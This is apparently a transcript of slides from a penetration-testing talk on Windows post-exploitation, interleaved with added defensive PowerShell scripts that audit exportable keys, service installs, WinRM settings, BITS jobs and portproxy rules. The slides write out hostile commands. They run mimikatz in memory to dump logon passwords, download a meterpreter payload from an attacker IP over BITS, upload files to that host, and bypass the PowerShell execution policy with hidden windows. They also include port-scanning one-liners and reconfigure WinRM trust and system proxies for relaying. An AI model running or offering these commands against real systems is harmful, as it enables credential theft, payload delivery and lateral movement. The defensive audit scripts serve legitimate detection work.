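The defender's counterpart to the listing above, added here as an example and not part of the talk: it walks the LocalMachine\My store and reports private keys that are marked exportable (what mimikatz prints as "Exportabilité : OUI"), flagging code-signing certificates among them. It assumes an elevated PowerShell session on the host being audited; the function name is mine.

```powershell
# Added example, not from the talk: report private keys in the machine store that can be
# exported, which is the precondition for the certificate theft shown above.
# Assumes an elevated session on the host being audited.
function Get-ExportableKeyReport {
    [CmdletBinding()]
    param(
        [string]$StorePath = 'Cert:\LocalMachine\My'
    )

    $codeSigningOid = '1.3.6.1.5.5.7.3.3'   # id-kp-codeSigning
    $ekuType = [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension]

    foreach ($cert in Get-ChildItem -Path $StorePath) {
        if (-not $cert.HasPrivateKey) { continue }

        # Does the certificate carry the Code Signing EKU?
        $isCodeSigning = $false
        $ekuExt = $cert.Extensions | Where-Object { $_ -is $ekuType } | Select-Object -First 1
        if ($ekuExt) {
            $isCodeSigning = [bool]($ekuExt.EnhancedKeyUsages | Where-Object { $_.Value -eq $codeSigningOid })
        }

        # Legacy CSP keys expose CspKeyContainerInfo.Exportable. CNG-backed keys come back
        # as $null from .PrivateKey in Windows PowerShell, so they are listed for manual review.
        $exportable = 'review manually (CNG key or access denied)'
        try {
            $csp = $cert.PrivateKey
            if ($csp -and $csp.CspKeyContainerInfo) {
                $exportable = $csp.CspKeyContainerInfo.Exportable
            }
        } catch {
            # Opening the key container failed (usually access denied); keep the default text.
        }

        [pscustomobject]@{
            Subject     = $cert.Subject
            Thumbprint  = $cert.Thumbprint
            NotAfter    = $cert.NotAfter
            CodeSigning = $isCodeSigning
            Exportable  = $exportable
        }
    }
}

# Code-signing certificates first; any row with Exportable = True is the finding to act on.
Get-ExportableKeyReport |
    Sort-Object -Property CodeSigning -Descending |
    Format-Table -AutoSize
```

A key that shows up as exportable should be re-enrolled as non-exportable (or moved to a smart card/HSM) and the exposed certificate revoked.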
34. The setup…
Mimikatz is awesome and I want to execute it without putting bins on the box
37. Mimikatz
• Mimikatz detected by AV
• Sekurlsa.dll detected by AV
• WCE detected by AV
• WCE IN MEMORY! (kinda)
Stop submitting $#!+ to Virus Total!
38. Mimikatz
• New version (6 Sep 12) supports in-memory
• execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
43. New Incognito (find_token)
C:\>find_token.exe dc1
[*] Scanning for logged on users...
Server Name    Username
------------------------------------------------------
dc1            PROJECTMENTOR\jdoe
dc1            PROJECTMENTOR\jdoe
45. Release of NETVIEW
C:\Documents and Settings\user\Desktop>netview
Netviewer Help
--------------------------------------------------------------------
-d domain       : Specifies a domain to pull a list of hosts from
                  uses current domain if none specified
-f filename.txt : Speficies a file to pull a list of hosts from
-o filename.txt : Out to file instead of STDOUT
46. Release of NETVIEW
C:\Documents and Settings\user\Desktop>netview -d
[*] -d used without domain specifed - using current domain
[+] Number of hosts: 3
[+] Host: DC1
Enumerating AD Info
[+] DC1 - Comment -
[+] DC1 - OS Version - 6.1
[+] DC1 - Domain Controller
Enumerating IP Info
[+] DC1 - IPv4 Address - 172.16.10.10
Enumerating Share Info
[+] DC1 - Share - ADMIN$ Remote Admin
[+] DC1 - Share - C$ Default share
[+] DC1 - Share - IPC$ Remote IPC
[+] DC1 - Share - NETLOGON Logon server share
[+] DC1 - Share - SYSVOL Logon server share
Enumerating Session Info
[+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
Enumerating Logged-on Users
[+] DC1 - Logged-on - PROJECTMENTOR\jdoe
[+] DC1 - Logged-on - PROJECTMENTOR\jdoe
[+] Host: WIN7X64
Enumerating AD Info
[+] WIN7X64 - Comment -
[+] WIN7X64 - OS Version - 6.1
Enumerating IP Info
[+] WIN7X64 - IPv4 Address - 172.16.10.216
Enumerating Share Info
[+] WIN7X64 - Share - ADMIN$ Remote Admin
[+] WIN7X64 - Share - C$ Default share
[+] WIN7X64 - Share - IPC$ Remote IPC
Enumerating Session Info
[+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
Enumerating Logged-on Users
48. The setup…
Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
56. Sysinternals PSEXEC
POSITIVES
• Never going to be on any AV list
• Executes binary as user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
• Leaves PSEXESVC running
• Have to touch disk if not present already
57. Metasploit PSEXEC
POSITIVES
• Supports the use of hashes
NEGATIVES
• Some AVs flag service binary due to injection techniques used within
• Rundll32.exe is running
58. Metasploit PSEXEC-MOF
POSITIVES
• Drop a file and Windows automatically runs it. (MAGIC!)
NEGATIVES
• XP and below
– (only because Metasploit doesn’t automatically compile MOFs)
• ADMIN$ required
– (Unless you make code edits)
59. Metasploit PSEXEC-As-User
POSITIVES
• Executes as the current user
• No need for passwords or hashes
• Also a great way to bypass UAC.. But more on that later
NEGATIVES
• Some AVs flag service binary due to injection techniques used within
• Rundll32.exe is running
60. WMI
POSITIVES
• Never going to be on any AV list
• Executes binary as user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
61. PowerShell
POSITIVES
• Never going to be on any AV list
• Executes binary as user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
62. RemCom
POSITIVES
• Open source psexec
• You can add Pass-The-Hash sessions directly
– (open source and all)
• Runs as SYSTEM
NEGATIVES
• Binary, so again, can’t go over Metasploit
– portfwd Fu can still be used on a single IP
63. Winexe
POSITIVES
• Open source psexec
• Supports Pass-The-Hash sessions directly
• Runs as SYSTEM
NEGATIVES
• Binary, so again, can’t go over Metasploit
– portfwd Fu can still be used on a single IP
64. smbexec
POSITIVES
• Open source psexec
• Supports Pass-The-Hash
NEGATIVES
• Binary
– (but designed with shoveling over Metasploit in mind)
http://sourceforge.net/projects/smbexec/
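Every method compared above installs a service on the target, and the System log records that. As an added example (mine, not from the talk), the function below hunts Event ID 7045 for the fingerprints those tools leave: the PSEXESVC service named on the slides, the rundll32 stub Metasploit's psexec runs, and the default RemCom/winexe service names. It assumes an elevated session (plus the Remote Event Log Management firewall rule for remote hosts); the pattern set is an assumption to tune locally.

```powershell
# Added example, not from the talk: hunt the System log for service installations
# (Event ID 7045, "A service was installed in the system") carrying the fingerprints of
# the PsExec-style tools compared above. Assumes an elevated session.
function Find-PsExecStyleServiceInstall {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$Days = 7
    )

    $filter = @{
        LogName   = 'System'
        Id        = 7045
        StartTime = (Get-Date).AddDays(-$Days)
    }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull the named EventData fields (ServiceName, ImagePath, AccountName, ...)
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }

            $name = [string]$data['ServiceName']
            $path = [string]$data['ImagePath']
            $why  = @()

            # Default service names of the Sysinternals / open-source psexec clones
            if ($name -eq 'PSEXESVC')  { $why += 'Sysinternals PsExec service (PSEXESVC)' }
            if ($name -eq 'RemComSvc') { $why += 'RemCom service' }
            if ($name -eq 'winexesvc') { $why += 'winexe service' }
            # Metasploit psexec runs its stub through rundll32 ("Rundll32.exe is running" above)
            if ($path -match 'rundll32') { $why += 'rundll32 service stub (Metasploit psexec style)' }
            # Random alphabetic service and binary names, e.g. XyZaBcDe / XyZaBcDe.exe
            if ($name -match '^[A-Za-z]{8,16}$' -and $path -match '\\[A-Za-z]{8,16}\.exe"?\s*$') {
                $why += 'random-looking service and binary name'
            }
            # Service binary written through ADMIN$ or into a temp directory
            if ($path -match '\\Temp\\|\\ADMIN\$') { $why += 'service binary in a temp or ADMIN$ path' }

            if ($why.Count -gt 0) {
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    Computer  = $_.MachineName
                    Service   = $name
                    ImagePath = $path
                    RunsAs    = $data['AccountName']
                    Why       = ($why -join '; ')
                }
            }
        }
}

Find-PsExecStyleServiceInstall | Format-Table -AutoSize -Wrap
```

Legitimate installers raise 7045 too, so baseline the output against software deployment windows before alerting on it.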
65. Pass the hash for 15 years stuff here
• Firefox
• smbclient
• smbmount
• Rpcclient
• http://passing-the-hash.blogspot.com/
66. Zfasel’s stuff here
• If it ever gets released works ;-)
LOVE YOU FASEL!!
Go see his talk, it works now…
maybe…
67. Python && impacket
• http://code.google.com/p/impacket/
• PTH support for SMB/MSSQL/
68. WinRM (‘new’ hotness)
POSITIVES
• Never going to be on any AV list
• Executes binary as user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
69. Do you look for 5985 internally on your pen tests?
we would suggest it ;-)
src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
70. Victim: winrm quickconfig -q
Attacker:
winrm quickconfig -q
winrm set winrm/config/client @{AllowUnencrypted="true";TrustedHosts="192.168.1.101"}
Yes.. That’s right, THE ATTACKER says which hosts to trust…
Sooooo much fun to be had!
Oh, and did I mention it’s completely interactive? (You can enter password questions)
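The settings the two commands above flip (AllowUnencrypted and TrustedHosts on the client, plus whatever is listening on 5985) are the ones a defender should audit. The function below is an added example, mine rather than the talk's, that reads them through the WSMan: drive and reports findings; it assumes an elevated session on a host with the WinRM service installed, and the function name is mine.

```powershell
# Added example, not from the talk: audit the WinRM client/service settings the slide
# above tampers with, plus the listener exposure. Assumes an elevated session.
function Test-WinRmHardening {
    [CmdletBinding()]
    param()

    $findings = @()
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    if (-not $svc) { return 'WinRM service not present' }
    if ($svc.Status -ne 'Running') { return "WinRM service is $($svc.Status); nothing is listening" }

    # Client side: exactly the two values the attacker's "winrm set" line changes.
    $clientClear = (Get-Item -Path WSMan:\localhost\Client\AllowUnencrypted).Value
    $trusted     = (Get-Item -Path WSMan:\localhost\Client\TrustedHosts).Value
    if ($clientClear -eq 'true') {
        $findings += 'Client AllowUnencrypted=true: credentials and session data may travel in the clear'
    }
    if ($trusted -match '\*') {
        $findings += "Client TrustedHosts has a wildcard ($trusted): NTLM auth to any host"
    } elseif ($trusted) {
        $findings += "Client TrustedHosts is set ($trusted): NTLM auth to non-domain hosts allowed"
    }

    # Service side: unencrypted transport and Basic auth should both be off.
    if ((Get-Item -Path WSMan:\localhost\Service\AllowUnencrypted).Value -eq 'true') {
        $findings += 'Service AllowUnencrypted=true'
    }
    if ((Get-Item -Path WSMan:\localhost\Service\Auth\Basic).Value -eq 'true') {
        $findings += 'Service Basic authentication enabled'
    }

    # Listeners: an HTTP listener bound to * is the port 5985 the talk says to scan for.
    foreach ($listener in Get-ChildItem -Path WSMan:\localhost\Listener) {
        $props     = Get-ChildItem -Path $listener.PSPath
        $transport = ($props | Where-Object { $_.Name -eq 'Transport' }).Value
        $address   = ($props | Where-Object { $_.Name -eq 'Address' }).Value
        $port      = ($props | Where-Object { $_.Name -eq 'Port' }).Value
        if ($transport -eq 'HTTP' -and $address -eq '*') {
            $findings += "HTTP listener on all addresses, port $port (prefer HTTPS or restrict by firewall)"
        }
    }

    if ($findings.Count -eq 0) { 'No findings' } else { $findings }
}

Test-WinRmHardening
```

Findings are reverted with Set-Item on the same WSMan: paths (TrustedHosts to an empty string, AllowUnencrypted to false) or enforced centrally through the WinRM Client and Service Group Policy settings.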
71. Metasploit PSEXEC-WinRM
POSITIVES
• Never going to be on any AV list
• Executes binary as user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
DISCLAIMER: CURRENTLY VAPORWARE!!
but…
72. Build your own pyBear
• PySMB supports auth using hashes
• Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working
• Compile your own psexec with hash support
• ;-)
• Impacket (again)
73. Build your own Bear.rb
• Metasploit’s Rex library
– already has the hash passing goodness
– HDM committed a stand-alone version of PSEXEC on September 5th 2012
78.
• If OS !> Vista
– SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit)
• WINDOWS/EXEC (or any of the other psexec methods we just talked about)
– BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat ";" (or PAC)
– BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM MANUAL_PROXY 192.168.5.100:3128 ";"
– After you’re done use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY
• Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
79. NETSH & ProxyCFG
• Sets the WinHTTP proxy
– Not Windows’ proxy settings; only used if the program uses WinHTTP
• XP
– proxycfg -p 192.168.92.100:3128
– or
– proxycfg -u (pulls it from IE)
• Vista+
– netsh winhttp set proxy 192.168.92.100:3128
– or
– netsh winhttp import proxy source=ie
81. The setup…
Neat binaries that do backdoor/RAT behavior that are already there for us.
82. Windows is my backdoor
BITS
“BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.”
http://technet.microsoft.com/en-us/library/dd819415.aspx
83. Windows is my backdoor
BITS
There are three types of BITS transfer jobs:
- A download job downloads files to the client computer.
- An upload job uploads a file to the server.
- An upload-reply job uploads a file to the server and receives a reply file from the server application.
84. Windows is my backdoor
BITS (How-To)
• Set the server side up (HTTP, not standard setup)
– Google
• Uses PowerShell to upload/download
Import BITS:
PS C:\Users\cg> Import-Module BitsTransfer
Download files over BITS:
PS C:\Users\cg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:\Users\cg\Desktop\meterpdownload443.exe
85. Windows is my backdoor
BITS (How-To)
Upload files over BITS:
PS C:\Users\cg> Start-BitsTransfer -Source C:\Users\cg\Desktop\file2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -TransferType Upload
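Because BITS jobs survive reboots and run under the job owner's account, the same BitsTransfer module gives a defender the inventory. The function below is an added example (mine, not from the talk) that lists jobs for every user and reports any whose remote end is not an approved host; it assumes an elevated session, and the allowlist and function name are placeholders to adapt.

```powershell
# Added example, not from the talk: list BITS jobs for all users and flag transfers whose
# remote end is not an approved update/distribution host. Assumes an elevated session
# (other users' jobs are only visible then); the allowlist is a placeholder.
function Get-SuspiciousBitsJob {
    [CmdletBinding()]
    param(
        # Wildcards matched against the remote hostname; adapt to your WSUS/CDN hosts.
        [string[]]$AllowedHosts = @('*.windowsupdate.com', '*.microsoft.com', 'wsus.corp.example')
    )

    Import-Module BitsTransfer -ErrorAction Stop

    foreach ($job in Get-BitsTransfer -AllUsers) {
        foreach ($file in $job.FileList) {
            $remoteHost = ([uri]$file.RemoteName).Host
            $allowed = $false
            foreach ($pattern in $AllowedHosts) {
                if ($remoteHost -like $pattern) { $allowed = $true; break }
            }
            if ($allowed) { continue }

            [pscustomobject]@{
                JobId     = $job.JobId
                Name      = $job.DisplayName
                Owner     = $job.OwnerAccount
                Type      = $job.TransferType    # Download, Upload or UploadReply
                State     = $job.JobState
                Created   = $job.CreationTime
                Remote    = $file.RemoteName
                Local     = $file.LocalName
                # Command BITS runs when the job completes: another persistence lever to read
                NotifyCmd = $job.NotifyCmdLine
            }
        }
    }
}

Get-SuspiciousBitsJob | Format-Table -AutoSize -Wrap
```

Record the job details before cancelling anything with Remove-BitsTransfer, since the remote URL, local path and owner are the indicators you will want later.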
89. Windows is my backdoor
• PowerShell
– Does A LOT!
– Check out Exploit Monday and PowerSploit
– Carlos Perez has had lots of PowerShell blog posts
– I haven't found a meterpreter feature that can't be done with PowerShell
90. Windows is my backdoor
• PowerShell cool examples
– PowerShell hashdump (in SET)
– PowerShell exec method in MSSQL_Payload
– PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
91. Windows is my backdoor
• PowerShell cool examples
• Port Scanner:
PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
25 is open
• From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
92. Windows is my backdoor
• PowerShell cool examples
• Port Sweeper:
PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
10.1.1.5
• From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
93. Windows is my backdoor
• PowerShell cool examples
• Bypass execution policy
– Dave Kennedy talked about this at defcon 18
– Requires PowerShell v2.0 or above
– powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "C:\do_neat_ps_shit.ps1"
94. Windows is my backdoor
• CreateCMD stuff from Dave Kennedy
• In SET
• Pshexec by Carlos Perez
• https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb
• B64 encodes the command so you can pass via meterp or in another script
• powershell -noexit -EncodedCommand [b64enc BLOB]
95. Windows is my backdoor
• Metasploit to generate PowerShell
• Uses old powersploit technique
96. Windows is my backdoor
• How to run PowerShell from Meterpreter
– Use a bat file
C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\ipinfo2.ps1
Example:
meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
99. MSF WebDAV server
• net use \\ip\documents /User:Guest
• copy \\ip\documents\myexe.exe myexe.exe
• Available on github:
• https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/exploits/webdav_file_server.rb
101. The Setup…
LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
102. While we are on the subject…
Does anyone know what happens when you try to access a share on a windows box that doesn’t exist from another windows box??
Client -> Server: I want to access SHARE3
Server -> Client: I don’t have SHARE3
Is that it?
103. nope
(if webclient service is started – Vista+ manual start)
Client -> Server: I want to access SHARE3
Server -> Client: I don’t have SHARE3 on SMB
Client -> Server: I want to access SHARE3 over WebDAV
If you are following along at home, windows is always (unless disabled) listening on port 445 (SMB) so an attacker can’t override it, but rarely has anything listening on port 80
105. Meet the Microsoft Windows Firewall “PORTPROXY” feature
Basically it’s port-forwarding but can do so for:
IPv4 -> IPv4
IPv6 -> IPv4
IPv6 -> IPv6
IPv4 -> IPv6
In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
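The forwarders netsh creates are stored under the PortProxy service key, which is where a defender can see them even when netstat shows nothing. The function below is an added example (mine, not from the talk) that enumerates that key and cross-checks it against netsh; it assumes an elevated session, and the function name is mine.

```powershell
# Added example, not from the talk: enumerate portproxy forwarders from the registry, where
# they persist across reboots and stay visible even when netstat/TCPView show nothing,
# then cross-check against netsh. Assumes an elevated session.
function Get-PortProxyRule {
    [CmdletBinding()]
    param()

    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy'
    if (-not (Test-Path -Path $root)) { return }   # key is created the first time a rule is added

    foreach ($family in Get-ChildItem -Path $root) {               # v4tov4, v4tov6, v6tov4, v6tov6
        foreach ($proto in Get-ChildItem -Path $family.PSPath) {   # tcp
            $values = Get-ItemProperty -Path $proto.PSPath
            foreach ($prop in $values.PSObject.Properties) {
                if ($prop.Name -like 'PS*') { continue }       # skip the provider's metadata props
                # Value name is "listenaddress/listenport", data is "connectaddress/connectport"
                $listen  = $prop.Name  -split '/'
                $connect = $prop.Value -split '/'
                [pscustomobject]@{
                    Family         = $family.PSChildName
                    Protocol       = $proto.PSChildName
                    ListenAddress  = $listen[0]
                    ListenPort     = $listen[1]
                    ConnectAddress = $connect[0]
                    ConnectPort    = $connect[1]
                }
            }
        }
    }
}

Get-PortProxyRule | Format-Table -AutoSize

# Live view for comparison; portproxy rules only work while the IP Helper service runs.
netsh interface portproxy show all
Get-Service -Name iphlpsvc | Select-Object -Property Status, StartType
```

A forwarder nobody can account for is removed with netsh interface portproxy delete (or reset), and the registry key itself is worth baselining in endpoint monitoring.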
108. why
1. Give me SHARE3!
2. Portproxy!
3. AUTH!
4. AUTH! via portproxy
5. OK, you are in my Intranet, AUTOAUTH
6. AUTOAUTH!
7. kthxbai!
And yes, SMB_Relay works just fine if you have a route set up over your meterpreter shell of the connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
110. The setup…
Are DNS Payloads useful? Let’s talk about our public options
111. DNS Payloads
• Quick talk on currently available DNS payloads
• What’s available?
– CANVAS DNS Mosdef
– DNS Cat (skull security)
– Metasploit DNS Payloads
112. DNS Payloads
• Canvas DNS Mosdef
– Uses DNS TXT Records
• So it’s UDP and correctly formed?
– BUT
• Directly connects to the host
• Uses TXT records
– I’ve never pentested someone *good* that allowed this
114. DNS Payloads
• DNSCat (Skullsecurity)
– http://www.skullsecurity.org/wiki/index.php/Dnscat
– Uses recursive DNS requests
• So it’s UDP and correctly formed?
– Has a metasploit payload, so can make a msf dnscat binary to run and get shell
– Same as dnscat -d domain -exec "cmd.exe"
– BUT
• But does recursive DNS requests
• Never worked for me IRL
118. DNS Payloads
• Metasploit DNS
– Currently there are no full DNS payloads
• Aside from skullsecurity dnscat payload (not in trunk)
– There are several payloads that will go fetch ANOTHER payload and exec it for you via DNS
• dns_txt_query_exec.rb
• dns_query_exec.rb
• https://github.com/rapid7/metasploit-framework/pull/173
– Something in the works: http://dev.metasploit.com/redmine/issues/444#note-9